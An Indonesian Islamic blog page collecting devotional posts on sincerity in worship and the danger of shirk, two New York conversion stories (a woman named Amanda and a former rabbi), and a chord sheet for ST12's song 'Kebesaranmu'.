yudi

Amal yang Tetap Bermakna


Saudaraku, Berhati-hatilah bagi orang-orang yang ibadahnya temporal, karena bisa jadi perbuatan tersebut merupakan tanda-tanda keikhlasannya belum sempurna. Karena aktivitas ibadah yang dilakukan secara temporal tiada lain, ukurannya adalah urusan duniawi. Ia hanya akan dilakukan kalau sedang butuh, sedang dilanda musibah, atau sedang disempitkan oleh ujian dan kesusahan, meningkatlah amal ibadahnya. Tidak demikian halnya ketika pertolongan ALLOH datang, kemudahan menghampiri, kesenangan berdatangan, justru kemampuannya bersenang-senangnya bersama ALLOH malah menghilang.
Bagi yang amalnya temporal, ketika menjelang pernikahan tiba-tiba saja ibadahnya jadi meningkat, shalat wajib tepat waktu, tahajud nampak khusu, tapi anehnya ketika sudah menikah, jangankan tahajud, shalat subuh pun terlambat. Ini perbuatan yang memalukan. Sudah diberi kesenangan, justru malah melalaikan perintah-Nya. Harusnya sesudah menikah berusaha lebih gigih lagi dalam ber-taqarrub kepada ALLOH sebagai bentuk ungkapan rasa syukur.


Ketika berwudhu, misalnya, ternyata disamping ada seorang ulama yang cukup terkenal dan disegani, wudhu kita pun secara sadar atau tidak tiba-tiba dibagus-baguskan. Lain lagi ketika tidak ada siapa pun yang melihat, wudhu kitapun kembali dilakukan dengan seadanya dan lebih dipercepat.

Atau ketika menjadi imam shalat, bacaan Quran kita kadangkala digetar-getarkan atau disedih-sedihkan agar orang lain ikut sedih. Tapi sebaliknya ketika shalat sendiri, shalat kita menjadi kilat, padat, dan cepat. Kalau shalat sendirian dia begitu gesit, tapi kalau ada orang lain jadi kelihatan lebih bagus. Hati-hatilah bisa jadi ada sesuatu dibalik ketidakikhlasan ibadah-ibadah kita ini. Karenanya kalau melihat amal-amal yang kita lakukan jadi melemah kualitas dan kuantitasnya ketika diberi kesenangan, maka itulah tanda bahwa kita kurang ikhlas dalam beramal.

Hal ini berbeda dengan hamba-hamba-Nya yang telah menggapai maqam ikhlas, maqam dimana seorang hamba mampu beribadah secara istiqamah dan terus-menerus berkesinambungan. Ketika diberi kesusahan, dia akan segera saja bersimpuh sujud merindukan pertolongan ALLOH. Sedangkan ketika diberi kelapangan dan kesenangan yang lebih lagi, justru dia semakin bersimpuh dan bersyukur lagi atas nikmat-Nya ini.

Orang-orang yang ikhlas adalah orang yang kualitas beramalnya dalam kondisi ada atau tidak ada orang yang memperhatikannya adalah sama saja. Berbeda dengan orang yang kurang ikhlas, ibadahnya justru akan dilakukan lebih bagus ketika ada orang lain memperhatikannya, apalagi bila orang tersebut dihormati dan disegani.

Sungguh suatu keberuntungan yang sangat besar bagi orang-orang yang ikhlas ini. Betapa tidak? Orang-orang yang ikhlas akan senantiasa dianugerahi pahala, bahkan bagi orang-orang ikhlas, amal-amal mubah pun pahalanya akan berubah jadi pahala amalan sunah atau wajib. Hal ini akibat niatnya yang bagus.

Maka, bagi orang-orang yang ikhlas, dia tidak akan melakukan sesuatu kecuali ia kemas niatnya lurus kepada ALLOH saja. Kalau hendak duduk di kursi diucapkannya, "Bismilahirrahmanirrahiim, ya ALLOH semoga aktivitas duduk ini menjadi amal kebaikan". Lisannya yang bening senantiasa memuji ALLOH atas nikmatnya berupa karunia bisa duduk sehingga ia dapat beristirahat menghilangkan kepenatan. Jadilah aktivitas duduk ini sarana taqarrub kepada ALLOH.

Karena banyak pula orang yang melakukan aktivitas duduk, namun tidak mendapatkan pertambahan nilai apapun, selain menaruh [maaf!] pantat di kursi. Tidak usah heran bila suatu saat ALLOH memberi peringatan dengan sakit ambaien atau bisul, sekedar kenang-kenangan bahwa aktivitas duduk adalah anugerah nikmat yang ALLOH karuniakan kepada kita.

Begitupun ketika makan, sempurnakan niat dalam hati, sebab sudah seharusnya di lubuk hati yang paling dalam kita meyakini bahwa ALLOH-lah yang memberi makan tiap hari, tiada satu hari pun yang luput dari limpahan curahan nikmatnya.

Kalau membeli sesuatu, perhitungkan juga bahwa apa yang dibeli diniatkan karena ALLOH. Ketika membeli kendaraan, niatkan karena ALLOH. Karena menurut Rasulullah SAW, kendaraan itu ada tiga jenis, 1) Kendaraan untuk ALLOH, 2) Kendaraan untuk setan, 3) Kendaraan untuk dirinya sendiri. Apa cirinya? Kalau niatnya benar, dipakai untuk maslahat ibadah, maslahat agama, maka inilah kendaraan untuk ALLOH. Tapi kalau sekedar untuk pamer, ria, ujub, maka inilah kendaraan untuk setan. Sedangkan kendaraan untuk dirinya sendiri, misakan kuda dipelihara, dikembangbiakan, dipakai tanpa niat, maka inilah kendaran untuk diri sendiri.

Pastikan bahwa jikalau kita membeli kendaraan, niat kita tiada lain hanyalah karena ALLOH. Karenanya bermohon saja kepada ALLOH, "Ya ALLOH saya butuh kendaraan yang layak, yang bisa meringankan untuk menuntut ilmu, yang bisa meringankan untuk berbuat amal, yang bisa meringankan dalam menjaga amanah". Subhanallah bagi orang yang telah meniatkan seperti ini, maka, bensinnya, tempat duduknya, shockbreaker-nya, dan semuanya dari kendaraan itu ada dalam timbangan kebaikan, insya ALLOH. Sebaliknya jika digunakan untuk maksiyat, maka kita juga yang akan menanggungnya.

Kedahsyatan lain dari seorang hamba yang ikhlas adalah akan memperoleh pahala amal, walaupun sebenarnya belum menyempurnakan amalnya, bahkan belum mengamalkanya. Inilah istimewanya amalan orang yang ikhlas. Suatu saat hati sudah meniatkan mau bangun malam untuk tahajud, "Ya ALLOH saya ingin tahajud, bangunkan jam 03. 30 ya ALLOH". Weker pun diputar, istri diberi tahu, "Mah, kalau mamah bangun duluan, bangunkan Papah. Jam setengah empat kita akan tahajud. Ya ALLOH saya ingin bisa bersujud kepadamu di waktu ijabahnya doa". Berdoa dan tidurlah ia dengan tekad bulat akan bangun tahajud.

Sayangnya, ketika terbangun ternyata sudah azan subuh. Bagi hamba yang ikhlas, justru dia akan gembira bercampur sedih. Sedih karena tidak kebagian shalat tahajud dan gembira karena ia masih kebagian pahalanya. Bagi orang yang sudah berniat untuk tahajud dan tidak dibangunkan oleh ALOH, maka kalau ia sudah bertekad, ALLOH pasti akan memberikan pahalanya. Mungkin ALLOH tahu, hari-hari yang kita lalui akan menguras banyak tenaga. ALLOH Mahatahu apa yang akan terjadi, ALLOH juga Mahatahu bahwa kita mungkin telah defisit energi karena kesibukan kita terlalu banyak. Hanya ALLOH-lah yang menidurkan kita dengan pulas.

Sungguh apapun amal yang dilakukan seorang hamba yang ikhlas akan tetap bermakna, akan tetap bernilai, dan akan tetap mendapatkan balasan pahala yang setimpal. Subhanallah

Baca selengkapnya ��

Amanda : Berawal Benci, Berakhir Cinta


Meski awalnya “membenci” Islam, gadis IOWA yang tinggal di Connecticut ini pun akhirnya ‘jatuh cinta’ pada Islam. Ia, akhirnya melafazkan syahadat

Sekitar awal September 2006 lalu, kelas Islamic Forum for non Muslims kedatangan seorang gadis bule bermata biru. Duduk di salah satu sudut ruang dengan mata yang tajam, hampir tidak kerkedip dan bahkan memperlihatkan pandangan yang tajam. Beberapa kali lolucen yang saya sampaikan dalam kelas itu, tidak juga menjadikannya tersenyum.

Ketika sesi tanya jawab dimulai, sang gadis itu mengangkat tangan, dan tanpa tersenyum menyampaikan pertanyaan-pertanyaan yang menjadikan sebagian peserta ternganga, dan bahkan sebagian menyangka kalau saya akan tersinggung dengan pertanyaan-pertanyaan itu.

“If Muhammad is a true prophet, then why he robbed and killed?”, tanyanya dengan suara yang lembut tapi tegas. “Why he forced the Jews to leave their homes, while they have been settled in Madinah a long time before Muhammad was born?”, lanjutnya.

Sambil tersenyum saya balik bertanya, “Where did you get this information? I mean, which book did you read”. Dia kemudian memperlihatkan beberapa buku yang dibawanya, termasuk beberapa tulisan/artikel yang diambil dari berbagai sumber di internet. Saya meminta sebagian buku dan artikel tersebut, tapi justru saya tidak menanggapi pertanyaan-pertanyaannya.

Saya balik bertanya, “Where are you from and where do you live?”. Ternyata dia adalah gadis IOWA yang sekarang ini tinggal di Connecticut.

Sambil memperkenalkan diri lebih jauh saya memperhatikan “kejujuran” dan “inteligensia” gadis tersebut. Walaupun masih belum bisa memperlihatkan wajah persahabatan, tapi nampaknya dia adalah gadis apa adanya.

Dia seorang “saintis” yang bekerja di salah satu lembaga penelitian di New York. Tapi menurutnya lagi, dan sinilah baru nampak sedikit senyum, “I am an IOWAN girl”. Ketika saya tanya apa maksudnya, dia menjawab: “a very country girl”.

Oleh karena memang situasi tidak memungkin bagi saya untuk langsung berdebat dengannya perihal pertanyaan-pertanyaan yang dilemparkan, saya mengusulkan agar pertanyaan-pertanyaannya dikirimkan ke saya melalui email, untuk selanjuntnya bisa berdiskusi lewat email dan juga pada pertemuan berikutnya. Kelas sore itupun bubar, tapi pertanyaan-pertanyaan gadis IOWA ini terus menggelitik benak saya.

Di malam hari, saya buka email sebelum tidur sebagaimana biasa. Gadis IOWA ini pun memenuhi permintaan saya. Ia memperkenalkan diri sebagai Amanda. Ia mengirimkan email dengan lampiran 4 halaman penuh dengan pertanyaan-pertanyaan –khususunya-- mengenai Rasulullah SAW. Saya sekali lagi tidak menjawab pertanyaan-pertanyaan tersebut, tapi mengajak untuk datang ke kelas Islamic Forum pada Sabtu berikutnya.

Ternyata, mungkin dia sadari sendiri bahwa beberapa peserta Forum pada Sabtu tadi kurang sreg dengan pertanyaan-pertanyaannya yang dianggap terlalu “polos dan tajam”. Maka dia mengusulkan kalau saya bisa menyediakan waktu khusus baginya untuk diskusi. Sayapun menerima usulan itu untuk berdiskusi dengannya setiap Kamis sore setelah jam kerja di Islamic Center.

Kita pun sepakat bertemu setiap jam 5:30 hingga 7:00 pm. Satu setengah jam menurut saya cukup untuk berdiskusi dengannnya.

Tanpa diduga, ternyata bulan Ramadhan juga telah tiba. Maka kedatangannya yang pertama untuk berdialog dengan saya terjadi pada Kamis ketiga bulan September 2006, di saat kita sedang bersiap-siap untuk berbuka puasa.

Dia datang, seperti biasa dengan berkerudung seadanya, tapi kali ini dengan sangat sopan, walau tetap dengan pandangan yang sepertinya curiga.

Kita memulai diskusi dengan pertanyaan-pertanyaan yang telah dikirimkan lewat email itu. Ternyata, baru satu masalah yang didiskusikan, sesekali diselingi sedikit perdebatan yang emosional. Adzan buka puasa telah dikumandangkan. Maka dengan sopan saya minta izin Amanda untuk berbuka puasa, tapi tidak lupa menawarkan jika ingin bergabung dengan saya. Ternyata, Amanda senang untuk ikut makan sore (ikut buka) dan nampak menikmati hidangan itu.

Setelah berbuka puasa, karena harus mengisi ceramah, saya sampaikan ke Amanda bahwa diskusi kita akan dilanjutkan Kamis selanjutnya. Tapi jika masih berkenan hadir, saya mempesilahkan datang ke Forum hari Sabtu. Dia berjanji untuk datang.

Sabtu berikutnya, dia datang dengan wajah yang lebih ramah. Duduk nampak lebih tenang, tapi seolah masih berat untuk tersenyum. Padahal, diskusi saya itu terkadang penuh dengan candaan. Maklumlah, selain memang dimaksudkan untuk tidak menampilkan Islam dengan penuh “kaku” saya ingin menyampaikan ke mereka bahwa Muslim itu juga sama dengan manusia lain, bisa bercanda (yang baik), tersenyum, dan seterusnya.

Amanda nampak serius memperhatikan semua poin-poin yang saya jelaskan hari itu. Kebetulan kita membahas mengenai penciptaan Hawa dalam konteks Al-Qur’an. Intinya menjelaskan bagaimana proses penciptaan Hawa dalam prospektif sejarah, dan juga bagaimana Al-Qur’an mendudukkan Hawa dalam konteks “gender” yang ramai diperdebatkan saat ini. Keseriusan Amanda ini hampir menjadikan saya curiga bahwa dia sedang mencari-cari celah untuk menyampaikan pertanyaan yang menyerang.

Ternyata sangkaan saya itu salah. Kini Amanda sebelum menyampaikan pertanyaan justeru bertanya dulu, “Is it ok to ask this question?”. Biasanya dengan tegas saya sampaikan, “Nothing is to be hesitant to ask on any thing or any issue in Islam. You may ask any issue range from theological issues up to social ones”.

Amanda pun menanyakan beberapa pertanyaan mengenai wanita, tapi kali ini dengan sopan. Hijab, poligami, konsep “kekuasaan” (yang dia maksudkan adalah qawwamah), dll. Saya hampir tidak percaya, bagaimana Amanda paham semua itu. Dan terkadang dalam menyampaikan pertanyaan-pertanyaan itu disertai bukti-bukti yang didapatkan dari buku-buku --yang justeru-- ditulis oleh para ulama terdahulu.

Saya berusaha menjawab semua itu dengan argumentasi-argumentasi “aqliyah”, karena memang saya melihat Amanda adalah seseorang yang sangat rasional. Alhamdulillah, saya tidak tahu, apakah dia memang puas atau tidak, tapi yang pasti nampak Amanda mengangguk-anggukkan kepala.

Demikian beberapa kali pertemuan. Hingga tibalah hari Idul Fitri. Amanda ketika itu saya ajak untuk mengikuti “Open House” di rumah beberapa pejabat RI di kota New York.

Karena dia masih kerja, dia hanya sempat datang ke kediaman Wakil Dubes RI untuk PBB. Di sanalah, sambil menikmati makanan Indonesia, Amanda kembali menanyakan pertanyaan-pertanyaan yang tajam. “If Islam respects religious freedom, why Ahmadiyah in Indonesia is banned? Why Lia Aminuddin is arrested?”.

Saya justeru terkejut dengan informasi yang Amanda sampaikan. Saya pribadi tidak banyak membaca hal ini, dan tidak terlalu mempedulikan. Maka saya jelaskan, dalam semua Negara tentu ada peraturan-peraturan yang perlu dipatuhi. Ahmadiyah dan Lia Aminuddian, jelas saya, bukan mendirikan agama baru tapi mendistorsi agama Islam. Oleh karena mereka merusak agama yang diyakini oleh masyarakat Muslim banyak, pemerintah perlu menertibkan ini. Kelihatannya penjelasan saya kurang memuaskan, tapi diskusi kekudian berubah haluan kepada makanan dan tradisi halal bihalal.

Singat cerita, beberapa Minggu kemudian Amanda mengirimkan email dengan bunyi sebagai berikut, “I think I start having my faith in Islam”. Saya hanya mengatakan, “All is in God’s hands and yours. I am here to assist you to find the truth that you are looking for”. Cuma, Amanda mengatakan bahwa perjalanannya untuk belajar Islam ini akan mengambil masa yang panjang.

“When I do some thing, I do it with a commitment. And I truly want to know Islam”. Saya hanya menjawabnya, “Take you time, Amanda”.

Alhamdulillah, setelah mempelajari Islam hampir tujuh bulan, dan setelah membaca berbagai referensi, termasuk tafsir Fii Zilalil Qur’an (Inggris version) dan Tafhimul Qur’an (English), dan beberapa buku hadits, Amanda mulai serius mempelajari Islam.

Minggu lalu, ia mengirimkan email ke saya. Isinya begini, “I have decided a very big decision..and I think you know what I mean. I am very scared now. Do you have some words of wisdoms?”.

Saya menjawab, “Amanda, you have searched it, and now you found it. Why you have to be scared?. You believe in God, and God is there to take your hands. Be confident in what you believe in”.

Tiga hari lalu, Amanda mengirimkan kembali emailnya dan mengatakan bahwa dia berniat untuk secara formal mengucapkan “syahahat” pada hari Senin mendatang (tanggal 5 Maret 2007 kemarin). Saya bertanya, kenapa bukan hari Sabtu atau Ahad agar banyak teman-teman yang bisa mengikuti? Dia menjawab bahwa beberapa teman dekatnya hanya punya waktu hari Senin.

Alhamdulillah, disaksikan sekitar 10 teman-teman dekat Amanda (termasuk non Muslim), persis setelah adzan Magrib saya tuntun ia melafazkan “Asy-hadu an laa ilaaha illa Allah-wa asyhadu anna Muhammadan Rasul Allah”, diiringi pekik takbir dan tetesan airmata beberapa temannya yang ikut hadir. Amandapun melakukan shalat pertama sebagai Muslim sore itu diikuti dengan doa bersama semoga Allah menguatkan jalannya menuju ridho Ilahi. oleh M. Syamsi Ali.

Amanda, selamat dan semoga Allah SWT selalu menjagamu dan menjadikanmu “pejuang” kebenaran!

Baca selengkapnya ��

Bahaya Syirik


Surat Al A'raf ayat 172 menjelaskan bahwa setiap bayi yang akan dilahirkan ke dunia, oleh Allah SWT sudah dimintai kesaksian tentang ketuhanan Allah SWT dengan pertanyaan, ''Bukankah Aku ini Tuhanmu?'' Setiap janin yang hendak menjadi manusia ini pun menjawab, ''Tentu saja kami menjadi saksi.'' Untuk apa Allah SWT meminta kesaksian seperti itu? Agar kelak di hari kiamat tidak ada orang (yang menyembah selain Allah SWT) berargumen bahwa mereka tidak tahu tentang ketuhanan dan keesaan Allah SWT.


Dalam sebuah hadits riwayat Al Hakim, Rasulullah SAW bersabda bahwa setiap bayi yang terlahir --dari dua orang tua Muslim maupun kafir-- itu berada dalam kondisi Muslim. Hanya apakah si anak itu tetap sebagai Muslim atau berubah menjadi musyrik atau kafir, itu tergantung agama yang diajarkan kedua orang tuanya. Setiap orang tua Muslim memiliki tugas utama dan pertama untuk menjaga akidah diri dan anak keturunannya istiqamah pada akidah yang mengesakan Allah SWT. Saat ini, tugas tersebut menjadi bertambah wajib untuk ditunaikan, karena semakin banyak pihak yang berkeinginan untuk menyeret kaum Muslim pindah agama dan keyakinan. Gerakan pemurtadan yang dilakukan dengan iming-iming yang menggiurkan adalah salah satu aktivitas yang terus menggoda akidah umat Islam. Selain itu juga ada paham pluralisme agama yang mengaburkan nilai-nilai kebenaran Islam. Semua agama dianggap sama. Sahabat Ismail bin Umayah pernah meminta nasihat kepada Rasulullah SAW. Beliau memberinya nasihat singkat dengan mengingatkan, ''Janganlah kamu menjadi manusia musyrik, menyekutukan Allah SWT dengan sesuatupun, meski kamu harus menerima risiko kematian dengan cara dibakar hidup-hidup atau tubuh kamu dibelah dua. '' (HR Ibnu Majah). Nasihat Rasulullah SAW itu tentu terkait dengan peringatan Allah SWT bahwa dosa syirik akan menghanguskan segala kebajikan dan merupakan dosa tak terampuni. Allah SWT berfirman, ''Jika kamu mempersekutukan Allah SWT niscaya akan hapuslah amalmu dan tentulah kamu termasuk orang-orang yang merugi.'' (QS Az Zumar:65). Di ayat yang lain Allah SWT berfirman, ''Sesungguhnya Allah SWT tidak akan mengampuni dosa syirik, dan Dia mengampuni dosa selain syirik, bagi siapa yang dikehendaki-Nya.'' (QS An Nisa 48). Semua keterangan tersebut terkait dengan syirik kufur, yakni orang yang menyembah kepada selain Allah SWT. Ada lagi perbuatan syirik yang dilakukan oleh orang Muslim, yang sering disebut dengan istilah syirik fasik. Yakni orang Muslim tapi mempercayai perdukunan, jampi-jampi, jimat-jimat, dan hal lain yang bersifat tahayul. Nabi Muhammad SAW bersabda, ''Sesungguhnya jampi-jampi, jimat-jimat dan guna-guna adalah syirik.'' (HR Abu Dawud dan Ibnu Majah). Bentuk syirik lainnya yang wajib dijauhi adalah riya, ibadah tidak dengan ikhlas karena Allah SWT, tapi karena ingin mendapat pujian, sanjungan atau gelar dari sesama manusia. Rasulullah SAW mengingatkan, ''Hati-hatilah kamu, jangan sekali-kali mencampuradukkan keta'atan kepada Allah SWT dengan mengharap pujian dari sesama manusia, nanti hancur pahala amal kamu.'' (HR Ath Thabrani). (Shiddiq Amien ) Bahaya Syirik

Surat Al A'raf ayat 172 menjelaskan bahwa setiap bayi yang akan dilahirkan ke dunia, oleh Allah SWT sudah dimintai kesaksian tentang ketuhanan Allah SWT dengan pertanyaan, ''Bukankah Aku ini Tuhanmu?'' Setiap janin yang hendak menjadi manusia ini pun menjawab, ''Tentu saja kami menjadi saksi.'' Untuk apa Allah SWT meminta kesaksian seperti itu? Agar kelak di hari kiamat tidak ada orang (yang menyembah selain Allah SWT) berargumen bahwa mereka tidak tahu tentang ketuhanan dan keesaan Allah SWT.

Dalam sebuah hadits riwayat Al Hakim, Rasulullah SAW bersabda bahwa setiap bayi yang terlahir --dari dua orang tua Muslim maupun kafir-- itu berada dalam kondisi Muslim. Hanya apakah si anak itu tetap sebagai Muslim atau berubah menjadi musyrik atau kafir, itu tergantung agama yang diajarkan kedua orang tuanya. Setiap orang tua Muslim memiliki tugas utama dan pertama untuk menjaga akidah diri dan anak keturunannya istiqamah pada akidah yang mengesakan Allah SWT. Saat ini, tugas tersebut menjadi bertambah wajib untuk ditunaikan, karena semakin banyak pihak yang berkeinginan untuk menyeret kaum Muslim pindah agama dan keyakinan. Gerakan pemurtadan yang dilakukan dengan iming-iming yang menggiurkan adalah salah satu aktivitas yang terus menggoda akidah umat Islam. Selain itu juga ada paham pluralisme agama yang mengaburkan nilai-nilai kebenaran Islam. Semua agama dianggap sama. Sahabat Ismail bin Umayah pernah meminta nasihat kepada Rasulullah SAW. Beliau memberinya nasihat singkat dengan mengingatkan, ''Janganlah kamu menjadi manusia musyrik, menyekutukan Allah SWT dengan sesuatupun, meski kamu harus menerima risiko kematian dengan cara dibakar hidup-hidup atau tubuh kamu dibelah dua. '' (HR Ibnu Majah). Nasihat Rasulullah SAW itu tentu terkait dengan peringatan Allah SWT bahwa dosa syirik akan menghanguskan segala kebajikan dan merupakan dosa tak terampuni. Allah SWT berfirman, ''Jika kamu mempersekutukan Allah SWT niscaya akan hapuslah amalmu dan tentulah kamu termasuk orang-orang yang merugi.'' (QS Az Zumar:65). Di ayat yang lain Allah SWT berfirman, ''Sesungguhnya Allah SWT tidak akan mengampuni dosa syirik, dan Dia mengampuni dosa selain syirik, bagi siapa yang dikehendaki-Nya.'' (QS An Nisa 48). Semua keterangan tersebut terkait dengan syirik kufur, yakni orang yang menyembah kepada selain Allah SWT. Ada lagi perbuatan syirik yang dilakukan oleh orang Muslim, yang sering disebut dengan istilah syirik fasik. Yakni orang Muslim tapi mempercayai perdukunan, jampi-jampi, jimat-jimat, dan hal lain yang bersifat tahayul. Nabi Muhammad SAW bersabda, ''Sesungguhnya jampi-jampi, jimat-jimat dan guna-guna adalah syirik.'' (HR Abu Dawud dan Ibnu Majah). Bentuk syirik lainnya yang wajib dijauhi adalah riya, ibadah tidak dengan ikhlas karena Allah SWT, tapi karena ingin mendapat pujian, sanjungan atau gelar dari sesama manusia. Rasulullah SAW mengingatkan, ''Hati-hatilah kamu, jangan sekali-kali mencampuradukkan keta'atan kepada Allah SWT dengan mengharap pujian dari sesama manusia, nanti hancur pahala amal kamu.'' (HR Ath Thabrani). (Shiddiq Amien )

Baca selengkapnya ��

Dan Pendeta Yahudi itupun Bersyahadat


Seminggu menjelang Ramadan lalu, kelas the Islamic Forum nampak lebih ramai dari biasanya. Mungkin karena banyak di antara muallaf itu ingin lebih mendalami puasa, baik dari segi hukum-hukum yang terkait maupun makna-makna hakikat dari puasa itu. Hampir semuanya wajah lama atau murid-murid lama, baik muallaf maupun non Muslims, yang telah mengikuti diskusi Islam di forum tersebut lebih dari 3 bulan. Tapi nampak juga beberapa wajah yang belum aku kenali sama sekali.

Salah satu wajah baru itu adalah seorang pria putih dengan janggut pendek yang terurus rapih. Duduk di pinggiran ruangan, dan nampak memperhatikan dengan seksama tapi terlihat cuwek. Aku sangka bahwa orang ini adalah seorang Muslim karena wajahnya mengekspresikan persetujuan dengan setiap poin yang kusebutkan siang itu. Tapi, nampak dingin dan sepertinya tidak nampak bahwa dia tertarik dengan penjelasan saya itu.


Saya memang memulai penjelasan saya dengan sejarah puasa kaum-kaum terdahulu. Merujuk pada kata-kata “kamaa kutiba ‘alalladzina min qablikum” (sebagaimana telah diwajibkan atas kaum-kaum sebelum kamu), saya kemudian merujuk kepada beberapa fakta sejarah puasa umat-umat terdahulu, termasuk kaum yahudi. Di saat saya intens menjelaskan ayat ini, tiba-tiba dia tersenyum dan mengangkat tangan.

“Yes Brother!” sapa saya. “Can I say something?” tanyanya. Tentu dengan senang saya menyetujuinya. Dia kemudian meminta maaf karena tiba-tiba masuk ke kelas ini tanpa permisi. “I feel I did some thing impolite”, katanya. “Oh no, this forum is open for every person, and doesn’t require any registration. You are in the right place on the right time”, jawabku.

“What did you want to say Brother? But let me ask you first, what is your name?”, tanyaku. “Sorry, I am Shimon!”, jawabnya.

Dia kemudian menjelaskan puasa dari perspektif Yahudi. Dengan sangat lancar dan seolah berceramah dia bersungguh-sungguh menjelaskan sejarah dan makna puasa dari pandangan ajaran Yahudi. Mendengarkan penjelasan itu, hampir semua yang hadir terkejut. Melihat situasi itu, sayapun bertanya: “Sorry Brother, are you a Muslim or not? And why do you know a lot about Judaism?”.

Sedikit gugup dia kemudian mengatakan: “Imam, actually I am a Rabbi. I was ordained Rabbi two years ago”. Mendengarkan penjelasannya itu rupanya membuat banyak peserta ternganga. Baru pertama kali kelas the Forum for non Muslims ini ditangani seorang Rabbi (pendeta Yahudi). Apalagi dalam penjelasannya tentang puasa itu seperti mendakwahkan ajarannya. Sehingga wajar kalau ada yang curiga kalau-kalau dia datang untuk sebuah misi.

Saya kemudian menyapah dengan ramah dan mengatakan: “Welcome to our class sir!”. Tapi untuk menenangkan para peserta saya menyampaikan kepadanya bahwa saya sudah seringkali terlibat dialog dengan pendeta-pendeta Yahudi, seraya menyebutkan beberapa Rabbi senior di kota New York . Mendengarkan nama-nama itu, rupanya cukup mengagetkan bagi dia. “All those are very respectful Rabbis!” katanya. “Yes, I am fortunate to have known them and be known by them!” kataku.

Saya kemudian menyampaikan terima kasih atas penjelasan-penjelas annya mengenai puasa di agama Yahudi. “It’s almost similar to ours. The only thing that you guys keep changing it throughout the history”. Mendengar itu, nampaknya dia setuju dan hanya mengangguk.

Saya kemudian melanjutkan penjelasan saya mengenai hukum-hukum puasa. Murid-murid muallaf, dan bahkan non Muslim yang hadir hari itu memang ingin tahu bagaimana menjalankan ibadah puasa. Tanpa terasa, penjelasan mengenai puasa itu memakan waktu lebih 2 jam. Akhirnya tiba sesi tanya jawab.

Rupanya tidak terlalu banyak hal yang ditanyakan oleh peserta dan waktu masih ada sekitar 45 menit. Maka kesempatan itu saya pergunakan untuk menjelaskan agama dan umat Yahudi dalam perspektif Al-Quran dan sejarah. Bahwa memang Al-Quran menyinggung secara gamblang sikap orang-orang Yahudi terdahulu, mulai sejak nabi Ya’kub hingga nabi-nabi kaum Israil lainnya, termasuk umat nabi Musa A.S.

Sejarah pergulatan politik, agama, kultur dan budaya antara kaum Muslimin dan kaum Yahudi di Madinah, termasuk bagaimana awal terbentuknya Piagam Madinah. Saya kemudian menjelaskan bagaimana toleransi Rasulullah S.A.W di Madinah dengan fakta-fakta sejarah yang akurat. Bagaimana Umar bin Khattab memberikan keluasan bagi kaum Yahudi untuk kembali menetap di Jerusalem setelah diusir oleh kaum Kristen. Bagaiman penguasa Islam di Spanyol memberikan “kesetaraan” (equality) kepada seluruh rakyatnya, termasuk kaum Yahudi. Bahkan bagaimana penguasa kaum Muslim di bawah Khilafah Utsmaniyah menerima pelarian Yahudi dari pengusiran dan “inquisasi Spanyol” kaum Kristen di Spanyol.

Penjelasan-penjelas an saya itu rupanya tidak bisa diingkari oleh Shimon. Rupanya mereka juga tahu fakta-fakta sejarah itu. Bahkan sebenarnya kebanyakan buku-buku sejarah toleransi Islam kepada umat Yahudi itu justeru ditulis oleh mereka yang non Muslim dan bahkan mereka yang beragama Yahudi sendiri. Saya bahkan mengutip pernyataan Kofi Annan, mantan Sekjen PBB, dalam sebuah acara interfaith di PBB tahun lalu.

Tanpa terasa 30 menit berlalu. Di akhir-akhir pertemuan itu, tiba-tiba Shimon sekali lagi dengan tatapan mata yang nampak acuh, mengangkat tangan. “Yes Brother, any comment?”, pancingku. “Yes, I think what you just said, for us Jews, are well known”, katanya. Dia kemudian berbicara panjang lebar mengenai upaya penyembunyian fakta-fakta sejarah itu. Dan pada akhirnya dia mengakui bahwa bagi mereka yang murni masih mengikuti ajaran Yahudi seharusnya percaya kepada risalah terakhir dan nabinya.

Saya kemudian memotong pembicaraan Shimom, seraya bercanda: “If so, do you consider yourself a genuine Jew or not”. Dia sepertinya tertawa, tapi nampaknya karena kepribadian dia yang memang kurang tersenyum dan nampak seperti cuwek, dia menjawab: “To be honest with you, I believe that this is the religion of Moses”. He came with the same mission that Mohamed brought around 15 centuries ago”, tegasnya.

Tanpa menyia-nyiakan kesempatan itu, saya tanya lagi: “So you believe that Mohammed is a messenger and prophet of God and his teaching is the true teaching of God?”, tanya saya. Dengan tenang dia menjawab: “I am sure about that. But I really don’t know what to do”.

“Brother Shimon”, basically you are a Muslim. What you need to do is simply you need to formalize your faith with the presence of witnesses”, jelasku.

Mendengarkan itu, dia nampak tersenyum tapi melihat raut wajahnya dia sepertinya cuwek. Tapi karena sejak awal memang demikian, saya yakin bahwa cuwek itu bukan berarti tidak serius, tapi memang itulah kepribadiannya. Tiba-tiba dia bertanya: “And how to do that?”. Saya menengok pada peserta lainnya yang juga ikut senang mendengarkan percakapan itu, lalu menjawab: “Brother, it’s very easy. What you need to do right know is that you must confess that there is no god worthy of worship but Allah, and that Muhammad is His Prophet and Messenger. Are you ready?” tanyaku.

Setelah dengan mantap menjawab “yes”, saya kemudian mengatakan kepada peserta lainnya yang hampir semuanya muallaf, “be witnesses for Allah!”. Maka, dengan suaranya yang lantang, Rabbi Shimon resmi mengucapkan “Syahadaaten”, diikuti kemudian oleh pekikan takbir para peserta Forum Islam yang kebanyakan wanita itu. Dan Ramadan kemarin adalah awal Ramadan baginya dengan puasa penuh secara Islam.

Kemarin siang, Sabtu 27 Oktober, setelah kelas selesai, Shimon mendekati dan berbisik: “I don’t know if this is an appropriate question to ask”, katanya. “What is that?”, tanyaku. “Who was that lady sitting to your right side, and is she married?”, tanyanya. “Why is the question?” tanyaku lagi. “I think it is the time for me to be serious in my life. I need a wife”, katanya serius.

“Ok Brother Shimon. I really forgot whom that you are talking about. But let me know next week”, jawabku. “Sorry Imam if that is considered inappropriate to ask”. “Oh not at all. It is in fact an important thing to ask. And believe me, it is also my responsibility to help you in this regard. We will talk next Saturday about it”, kataku sambil meninggalkan kelas.

Alhamdulillah, semoga mantan pendeta Yahudi ini dikuatkan dan dan dijadikan da’I yang tangguh bagi kebenaran di masa depan. Amin! ... New York , 29 Oktober 2007

Baca selengkapnya ��

St 12 - Kebesaranmu

Intro: C E
Am F

C Em
Kau tempatku mengadu hati
F Em C
Pemberi segala hidup
F G C Am
Dunia dan seisinya milikMu
Dm G
mencintaiMu sejati


C E

C Em
Ku manusia yang penuh dosa
F Em C
berharap ampunan-Mu
F G C Am
Lihat dilangit kesempurnaan hadirMu
Dm G C
Kau cinta pertama dalam hidup

Reff:
C G Am
Allahu Akbar, Maha Besar
F G C G
MemujaMu begitu indah
C G Am
Selalu kau berikan semua
F G C
KebesaranMu Tuhan

Solo: Am G F C
Am G F .......

